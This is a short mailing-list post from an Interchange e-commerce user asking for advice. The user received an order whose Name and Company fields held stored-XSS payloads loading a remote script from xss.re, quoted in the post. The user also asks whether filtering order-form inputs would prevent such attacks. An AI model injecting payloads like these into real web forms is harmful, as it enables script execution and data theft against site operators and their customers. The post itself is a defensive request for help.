[ic] xss issue?

DB db at m-and-d.com
Thu Sep 15 02:10:35 UTC 2016

I received an order with stuff like this

            Name: Linda Juan">script src=//xss.re/692>/script>
         Company: ">script src=//xss.re/692>/script>
   Email address: juanlinda123 at gmail.com

I'm using 5.10 and a modified foundation. The payment method was
check/money order. I'm hoping to prevent this of course. Adding a
[filter] to input fields on the order form is the first thing that comes
to mind. Is that a reasonable solution?


More information about the interchange-users mailing list